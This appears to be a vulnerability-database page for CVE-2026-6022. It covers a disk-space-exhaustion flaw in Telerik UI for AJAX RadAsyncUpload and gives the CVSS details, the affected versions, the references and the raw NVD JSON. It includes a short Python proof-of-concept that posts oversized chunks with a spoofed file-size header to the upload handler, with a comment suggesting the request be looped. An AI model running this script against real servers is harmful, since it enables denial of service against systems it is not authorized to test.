CVE-2026-6022

Description

In Progress® Telerik® UI for AJAX prior to 2026.1.421, RadAsyncUpload contains an uncontrolled resource consumption vulnerability that allows file uploads to exceed the configured maximum size due to missing cumulative size enforcement during chunk reassembly, leading to disk space exhaustion.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:progress:telerik_ui_for_asp.net_ajax:*:*:*:*:*:*:*:* - VULNERABLE

Progress® Telerik® UI for AJAX < 2026.1.421

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example)
# The endpoint usually looks like: /Telerik.Web.UI.WebResource.axd?type=rau or specific handler
target_url = "http://target-site/Telerik.Web.UI.WebResource.axd?type=rau"

# Headers mimicking a Telerik chunked upload
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
    "X-File-Name": "exploit.dat",
    "X-File-Size": "999999999999" # Misleading size or bypass logic
}

# Simulate sending chunks to exhaust disk
# Note: This is a conceptual PoC. Real exploitation depends on specific version parameters.
print("Sending malicious chunks to exhaust disk space...")

try:
    # Sending a large chunk
    data = "A" * 10 * 1024 * 1024 # 10MB chunk
    # In a real scenario, loop this and manipulate metadata to bypass single chunk checks
    response = requests.post(target_url, headers=headers, data=data)
    print(f"Response Status: {response.status_code}")
except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6022
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6022
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6022/
[4] VulDB https://vuldb.com/cve/CVE-2026-6022
[5] https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-uncontrolled-resource-consumption-cve-2026-6022

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6022", "sourceIdentifier": "[email protected]", "published": "2026-04-22T08:16:12.903", "lastModified": "2026-05-05T18:39:54.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Progress® Telerik® UI for AJAX prior to 2026.1.421, RadAsyncUpload contains an uncontrolled resource consumption vulnerability that allows file uploads to exceed the configured maximum size due to missing cumulative size enforcement during chunk reassembly, leading to disk space exhaustion."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:progress:telerik_ui_for_asp.net_ajax:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.1.421", "matchCriteriaId": "E2294D8C-7233-41C4-8A32-DB1239FC7805"}]}]}], "references": [{"url": "https://www.telerik.com/products/aspnet-ajax/documentation/knowledge-base/kb-security-uncontrolled-resource-consumption-cve-2026-6022", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}